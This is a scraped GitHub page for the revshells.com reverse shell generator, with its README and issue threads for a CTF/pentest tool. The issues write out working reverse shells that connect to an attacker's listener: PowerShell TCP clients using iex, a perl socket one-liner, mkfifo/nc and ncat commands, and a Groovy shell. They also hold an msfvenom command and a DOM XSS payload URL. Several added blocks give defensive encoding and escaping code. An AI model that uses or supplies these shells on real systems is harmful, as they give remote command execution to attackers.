0dayctf / reverse-shell-generator

Hosted Reverse Shell generator with a ton of functionality. -- (Great for CTFs)

Home Page: https://revshells.com

License: MIT License

HTML 21.61% CSS 10.87% JavaScript 67.49% Dockerfile 0.02%
security ctf revshell generator hacking tryhackme

reverse-shell-generator's Introduction

reverse-shell-generator

Hosted Reverse Shell generator with a ton of functionality -- (great for CTFs)

Hosted Instance

https://revshells.com

Features

  • Generate common listeners and reverse shells
  • Save button to download Payloads from browser.
  • Raw mode to cURL shells to your machine.
  • Button to increment the listening port number by 1
  • URI and Base64 encoding
  • LocalStorage to persist your configuration
  • Dark, Light and Meme Modes
  • HoaxShell integration with custom listener (see link below for more information) | Credit: https://github.com/t3l3machus

HoaxShell Listener Docs

https://github.com/t3l3machus/hoaxshell/tree/main/revshells

Dev

If you want to modify any of the server functions (for example, the ones behind raw link support), run the site with the netlify dev command:

npx netlify dev

Using Docker

Run the following commands within this repository to spin up the instance locally in a Docker container:

docker build -t reverse_shell_generator .

docker run -d -p 80:80 reverse_shell_generator

Browse to http://localhost:80

Contributors ✨

Thanks goes to these wonderful people (emoji key):

  • Ryan Montgomery 👀
  • Chris Wild 📆 🔧 🚇 🎨
  • Chris Papadopoulos 🎨
  • Alan Foster 🚇
  • AG 🚧
  • Joseph Rose 🤔
  • Jabba 🔣
  • Jake Ruston 🔣
  • Muhammad Ali 🔧
  • edrapac 🔧
  • epi 🔧
  • Brandon 💻
  • Robiot 🖋 🚧
  • Adam Bertrand 🖋
  • Rohit Kumar Ankam 🔧
  • Panagiotis Chartas 🚇 🔧

This project follows the all-contributors specification. Contributions of any kind welcome!

reverse-shell-generator's People

Contributors

0dayctf, 0magenta0, alanfoster, allcontributors[bot], ayhamal-ali, b1nhack, briskets, containedreality, cosad3s, earthenvessel, epi052, freezerodays, grimbelhax, h0j3n, hugo-syn, hydragyrum, johnjhacking, joker2a, martinsohn, minhnq22, muirlandoracle, ngn13, noraj, notsujansharma, robiot, rohitkumarankam, saspect488, starnumber12046, swanandx, t3l3machus

reverse-shell-generator's Issues

[Improvement] Dynamically change default shell selection based on OS

I noticed OS selection preserves the state of the shell selection. Would it be better if the default shell selection matched the target OS's default shell to serve as the initial placeholder?

As shown in the example screenshot, selecting Windows retains /bin/sh (or whatever the previous selection was), as opposed to defaulting to cmd, for instance.

This is a very low-priority issue, but a potential consideration for improvement.

image

Create a One-Stop-Shop for Reverse Shells and Stabilization Techniques

I recommend creating a dedicated section on shell stabilization techniques for the revshells.com website. This would provide users with a one-stop-shop for both reverse shell payloads and shell stabilization techniques, eliminating the need to search for this information elsewhere. The section could include topics such as using terminal multiplexers, creating persistence mechanisms, and upgrading shells to more advanced versions. Thank you for considering this suggestion, as it would make your website an even more valuable resource for the penetration testing and hacking community.

Nothing I tried worked

PS C:\Users\Zhentor> $LHOST = "127.0.0.1"; $LPORT = 8080; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
New-Object : Exception calling ".ctor" with "2" argument(s): "No connection could be made because the target machine
actively refused it 127.0.0.1:8080"
At line:1 char:51
+ ... $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $Netwo ...
+              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [New-Object], MethodInvocationException
    + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

You cannot call a method on a null-valued expression.
At line:1 char:101
+ ... ient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $Strea ...
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

New-Object : A constructor was not found. Cannot find an appropriate constructor for type IO.StreamReader.
At line:1 char:158
+ ... ); $StreamReader = New-Object IO.StreamReader($NetworkStream); $Strea ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (:) [New-Object], PSArgumentException
    + FullyQualifiedErrorId : CannotFindAppropriateCtor,Microsoft.PowerShell.Commands.NewObjectCommand

New-Object : A constructor was not found. Cannot find an appropriate constructor for type IO.StreamWriter.
At line:1 char:218
+ ... ); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $Strea ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (:) [New-Object], PSArgumentException
    + FullyQualifiedErrorId : CannotFindAppropriateCtor,Microsoft.PowerShell.Commands.NewObjectCommand

The property 'AutoFlush' cannot be found on this object. Verify that the property exists and can be set.
At line:1 char:262
+ ... StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffe ...
+                               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

You cannot call a method on a null-valued expression.
At line:1 char:704
+ ... ter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $Netwo ...
+                                            ~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:724
+ ... $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $Strea ...
+                                        ~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:748
+ ... Client.Close(); $NetworkStream.Close(); $StreamReader.Close(); $Strea ...
+                                         ~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:771
+ ... $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
+                                                 ~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

PS C:\Users\Zhentor>

Here's the PowerShell 1 method; maybe you can read it and get me an answer. My Kali listens to the same port but there is no connection.

Perl payload not parsed properly

When selecting the "perl no sh" payload, the IP is not parsed properly.

Result:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"80:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Expected result:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Add ncat.exe option to nc listener

It would be great to add a listener option for "ncat.exe"

I use this because with WSL, I prefer to call the Windows netcat executable directly from Linux, and this is the simplest way to do that. It ensures that the Windows machine binds to that port and you don't have to worry about NAT from inside the WSL instance.

Otherwise, there could be a check box that adds the ".exe" to the command which would apply to all the different listeners.

Base64 output not encoding user submitted variables

Generating a Bash -i reverse shell with no encoding functions as expected.
image

Updating the generator to encode output in Base64 appears to function as expected.
image

Decoding the Base64-encoded string shows the user input parameters were not correctly passed to the Base64 encoding function.
image

Shell prompt

Sometimes this gets stuck for a weird reason:

image
Don't know why...
Any help?

Add powershell

Hi,
Please add this PowerShell reverse shell as it's better than all the ones included:
https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

PowerShell Base64 encoded command is not in the correct format

The PowerShell #3 (Base64) generates an invalid Base64 string and doesn't work when running it in Windows. This is the error seen when attempting to run the command in Windows 10.

At line:1 char:1
+ 挤楬湥⁴‽敎⵷扏敪瑣匠獹整⹭敎⹴潓正瑥⹳䍔䍐楬湥⡴ㄢ㈷㌮⸱㈱⸰∸㐬〰⤰␻瑳敲浡㴠␠汣敩瑮䜮瑥瑓敲浡⤨嬻祢整嵛⑝祢整⁳‽⸰㘮㔵㔳╼笥細眻楨敬 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

The string should be converted to UTF-16LE prior to encoding to Base64. In Linux, this can be done with the command echo -n "whoami" | iconv -f UTF-8 -t UTF-16LE .
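
The encoding mismatch described in this issue, as an added example that is not code from the project: PowerShell's -EncodedCommand parameter decodes Base64 into UTF-16LE text, so UTF-8 bytes are read two at a time and turn into CJK characters like those in the error above. The helper names are assumptions; the triage function is the kind of check an analyst can run on a Base64 value pulled from process command-line logs.

```javascript
// Added example (Node.js): helper names are assumptions, not part of the generator.

// What the issue asks for: Base64 over the UTF-16LE bytes of the script text.
function encodeForPowerShell(script) {
  return Buffer.from(script, "utf16le").toString("base64");
}

// Heuristic for mostly-ASCII scripts: in UTF-16LE every second byte is 0x00.
function looksLikeUtf16le(bytes) {
  if (bytes.length === 0 || bytes.length % 2 !== 0) return false;
  let zeroHighBytes = 0;
  for (let i = 1; i < bytes.length; i += 2) {
    if (bytes[i] === 0) zeroHighBytes++;
  }
  return zeroHighBytes / (bytes.length / 2) >= 0.8;
}

// Decode a logged Base64 value and report which encoding was used underneath.
// `asPowerShellReadsIt` is always the UTF-16LE interpretation, i.e. what the
// PowerShell parser (and any AMSI-based scanner) is actually handed.
function triageEncodedCommand(b64) {
  const bytes = Buffer.from(b64, "base64");
  const asPowerShellReadsIt = bytes.toString("utf16le");
  if (looksLikeUtf16le(bytes)) {
    return { encoding: "utf-16le", text: asPowerShellReadsIt, asPowerShellReadsIt };
  }
  // Wrong encoding: the readable text only appears when decoded as UTF-8.
  return { encoding: "utf-8", text: bytes.toString("utf8"), asPowerShellReadsIt };
}

// Constructed samples built from the "whoami" string used in the issue.
const CORRECT = encodeForPowerShell("whoami");                    // UTF-16LE first
const MISENCODED = Buffer.from("whoami", "utf8").toString("base64"); // the bug

console.log(CORRECT, triageEncodedCommand(CORRECT));
console.log(MISENCODED, triageEncodedCommand(MISENCODED));
```
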

Can't open RAW, or copy payload or download payload - Docker compose

I built from latest version

this is my docker-compose :

version: '3'
services:
  revshells:
    image: reverse_shell_generator:latest
    container_name: revshells
    ports:
      - "7778:80"
    restart: always
    volumes:
      - /directory_for_container/:/revshells/
  1. Can't copy; I get this error message
    https://imgur.com/6dI5b3O.png

  2. Downloading opens new window to save then nothing happens

  3. Opening in RAW isn't working either
    https://imgur.com/WqIUvuU.png

ncat udp/mkfifo could use alternate forms?

Was watching IppSec's video walkthrough of Nibbles from app.hackthebox.com and noticed that the ncat udp reverse shell used in this repo didn't work, while the one from pentestmonkey.org did.

This works
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f

While these two did not

ncat mkfifo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f

ncat udp
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.14.3 4444 >/tmp/f

Basically seems to be the diff between sh and /bin/sh

Maybe the generator could use some more flavor options?

Windows reverse shell in C won't work

On the website, the Windows reverse shell is a copy of the Linux one, just /bin/bash is replaced with cmd. It can't work for two reasons:

  • Windows sockets cannot be created in the Linux way
  • the following code will error:
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);

Because on Windows, sockets are not valid file descriptors.
If you want a Windows C reverse shell, I recommend this one

msfvenom / Python Stageless Reverse TCP output file extension error

For msfvenom, the command for "Python Stageless Reverse TCP" is:
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py",
This command makes a "shell.py", but cmd/unix/... is designed to generate shell commands

└─# msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=4444 -f raw -o shell.py 
Saved as: shell.py

└─# cat shell.py
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1w[...]Ip')[0]))"

At execution time as a Python script: error

└─$ python shell.py
  File "/home/test/shell.py", line 1
    python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1w[...]Ip')[0]))"
SyntaxError: invalid syntax

At execution time as a bash script: well

└─$ /bin/sh shell.py

2 possible solutions:

  • change the payload to python/shell_reverse_tcp
  • change the output file name to shell.sh

PS : Thank you very much for this great app

Add MIT License

Would love to use the project, however, need the MIT license in the project to do so.

Thanks!

nc.exe wrong command

When you try to generate a nc.exe revshell, the command input is sometimes wrong. For example, it will output nc.exe -e sh 10.10.10.10 4444 when it should be using nc.exe -e cmd.exe 10.10.10.10 4444.

Fix Groovy Shell

Add groovy shell compatibility for Windows and Linux by updating the cmd string.
For instance if jenkins was installed on Windows versus Linux, they would be different.

[Domain donation] Would you like revshell.download?

Hi

Some years ago I purchased the domain revshell.download with the intent of doing something similar to this project (which I was unaware existed). The domain is actually newer than this project, hehe 😅.

My registration expires in ~1 year, but if you accept this offer, I can renew it for another 3 years (maybe 5) and then transfer it to you.

Full disclosure: I purchased it in a nice deal at porkbun.com for ~ 4.25/year, if you want to buy it directly when it expires in August.

ip input not sanitized.

It's absurd and surely an intentional flaw but the limit on the length of the IP field is the only thing that prevents XSS payloads from running on https://www.revshells.com/.

We really don't want some modified implementation of this to end up as an xsshell (webshell) do we?
image

advanced cannot work

With online mode, the advanced options are blank.
It is the same with another PC.
However, it works on my phone.
I have closed the AV system and firewall.

Self XSS (no impact)

No character limit in the IP Address field created the possibility of a self XSS, I will fix this at a future time. If anyone can show impact, I'll fix it immediately :)

P.S: Make sure to blame @AyhamAl-Ali 😂

Port number gets permanently stuck on NaN on firefox 123.0.1.

Once you go NaN, that's it. Clearing cache does not help. Manually entering a port number does not help. Pressing +1 does not help.

image

Changing portInput through console does not work. (Invoking +1 does work, as in it doesn't throw an error. It still stays at NaN)

Trying to edit the text area through the inspector doesn't work because it's not a text area, it's some weird flexbox JavaScript mess containing a bunch of events.

Changing the ID as such finally unlocked the +- buttons.
image
Though, it couldn't be changed through console for some reason. Inputting into the port box still didn't work until it was at a value other than NaN.

No errors, nothing blocked in the network tab. Nothing blocked by uBlock Origin, nothing bugging out in console besides your average CSS. The scripts were simply never triggered. Even if manually invoked through console.

image

Don't really have any other debugging info, since none of the usual Firefox culprits like ETP seem to have been at play.

Security Issue: DOM XSS in reverse shell generator

Hi Team,

I have noticed a security issue in the reverse shell generator.

Issue Description:

An attacker can trigger the XSS vulnerability in the victim machine using the below payload

https://www.revshells.com/?#ip=%3Cimg%20src=x%20onerror=alert(document.domain)%20/%3E

Ref: https://portswigger.net/web-security/cross-site-scripting/dom-based

Remediation:

Do not trust the user input. HTML escape the user input before rendering in the DOM.

Thanks,
SRK.
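
The remediation requested here and in the two earlier IP-field reports ("ip input not sanitized" and "Self XSS"), as an added example that is not the project's code: validate the fragment parameters against an allow-list when they are read, and escape at the point of output. Function names, the validation policy and the default values are assumptions; the test input is the URL from the report above.

```javascript
// Added example (Node.js): names and validation policy are assumptions, not revshells.com code.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape the five characters that can change the HTML parsing context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Read "key=value" pairs from the URL fragment, e.g. "#ip=10.10.10.10&port=4444".
function parseFragment(url) {
  const fragment = new URL(url).hash.replace(/^#/, "");
  return Object.fromEntries(new URLSearchParams(fragment));
}

// Allow-list: hostname labels (dotted quads also match) or a run of IPv6 characters.
// Nothing that passes can contain a markup character.
const HOSTNAME = /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/i;
const IPV6_CHARS = /^[0-9a-f:]{2,39}$/i;
function isValidHost(value) {
  if (typeof value !== "string" || value.length === 0 || value.length > 253) return false;
  return HOSTNAME.test(value) || (value.includes(":") && IPV6_CHARS.test(value));
}

// Ports must be decimal integers in 1..65535; anything else (including "NaN") falls back.
function parsePort(value, fallback) {
  if (typeof value !== "string" || !/^\d{1,5}$/.test(value)) return fallback;
  const port = Number(value);
  return port >= 1 && port <= 65535 ? port : fallback;
}

// Vulnerable pattern: untrusted text concatenated into markup (e.g. assigned to innerHTML).
function renderUnsafe(ip) {
  return `<span class="ip">${ip}</span>`;
}

// Hardened: escape at the output boundary. In a browser, prefer element.textContent = ip.
function renderSafe(ip) {
  return `<span class="ip">${escapeHtml(ip)}</span>`;
}

// Validate on input, so a bad fragment never reaches storage or the page.
function loadSettings(url, defaults) {
  const params = parseFragment(url);
  return {
    ip: isValidHost(params.ip) ? params.ip : defaults.ip,
    port: parsePort(params.port, defaults.port),
  };
}

// The URL from the report above, used as the test input.
const REPORTED_URL =
  "https://www.revshells.com/?#ip=%3Cimg%20src=x%20onerror=alert(document.domain)%20/%3E";
const DEFAULTS = { ip: "10.10.10.10", port: 4444 }; // constructed defaults

console.log(loadSettings(REPORTED_URL, DEFAULTS));
console.log(renderSafe(parseFragment(REPORTED_URL).ip));
```
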

Incorrect URLEncode and Double URLEncode?

I'm guessing "URLEncode" is meant to perform URL encoding, but currently it doesn't encode any URL-reserved characters at all such as e.g. "&" or "/".

I'm further guessing "Double URLEncode" is meant to perform URL encoding twice, but currently it performs URL encoding once (but unlike "URLEncode" it performs complete URL encoding).

Another relevant issue is that HTML escaping is performed before the URL encoding, causing HTML entities to be URL encoded. E.g., "&" will be HTML escaped to "&amp;" which in turn will be URL encoded to "%26amp%3B", but the expected encoding is "%26".

I suggest these issues are fixed by...

  • letting "URLEncode" perform encoding using "encodeURIComponent" (or perhaps the "fixedEncodeURIComponent" described at MDN? Maybe unnecessary),
  • letting "Double URLEncode" do the same URL encoding as "URLEncode" but twice, and
  • delay HTML-escaping until after URL encoding. If the URL encoding is fixed, then HTML-escaping should be unnecessary. However, it might be good practice to keep the HTML-escaping, but if so then not like it's done in script.js (substring substitution) but instead like it's done in raw-link.js (utilize HTMLElement.innerText or Node.textContent), i.e. leave escaping to the browser.
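
The three suggestions above, as an added example that is not taken from script.js or raw-link.js. Function names and the sample string are assumptions; the built-in encodeURI appears only because it reproduces the symptom described for "URLEncode", and the page does not say which call the project uses.

```javascript
// Added example (Node.js or browser): function names are hypothetical.

// Percent-encode everything outside the RFC 3986 "unreserved" set.
// encodeURIComponent leaves ! ' ( ) * untouched, so they are encoded in a second
// pass (the "fixedEncodeURIComponent" variant from MDN that the issue mentions).
function urlEncode(text) {
  return encodeURIComponent(text).replace(
    /[!'()*]/g,
    (ch) => "%" + ch.charCodeAt(0).toString(16).toUpperCase()
  );
}

// "Double URLEncode": the same encoding applied twice, so each "%" becomes "%25".
function doubleUrlEncode(text) {
  return urlEncode(urlEncode(text));
}

// Minimal HTML escaper for text that will be placed into markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Bug pattern from the issue: HTML-escape first, then URL-encode the entities.
function encodeWrongOrder(text) {
  return urlEncode(escapeHtml(text));
}

// Corrected order: URL-encode the raw value, HTML-escape only when building markup.
// After urlEncode the string holds only A-Z a-z 0-9 - _ . ~ and %, so the escape
// step changes nothing; that is why the issue calls it unnecessary.
function encodeForDisplay(text) {
  return escapeHtml(urlEncode(text));
}

// Constructed sample containing reserved characters and a quote.
const SAMPLE = "a&b/c d'e";

console.log("encodeURI        :", encodeURI(SAMPLE));      // reserved chars survive
console.log("urlEncode        :", urlEncode(SAMPLE));
console.log("doubleUrlEncode  :", doubleUrlEncode(SAMPLE));
console.log("wrong order (&)  :", encodeWrongOrder("&"));
console.log("display order (&):", encodeForDisplay("&"));
```
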

Remove -l in nc revshell

Hi 👋

As stated in the man page, "-l: Used to specify that nc should listen for an incoming connection rather than initiate a connection to a remote host. It is an error to use this option in conjunction with the -p, -s, or -z options. Additionally, any timeouts specified with the -w option are ignored."

I suggest removing -p in the command for the listener

Cheers

Add Groovy reverse shell

Groovy RSH: Source: https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76#file-revsh-groovy
Add for windows only into data.js

{ 
    "name": "Groovy",
    "command":"String host=\"{ip}\";int port={port};String cmd=\"{shell}\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();",
    "meta":["windows"]
}
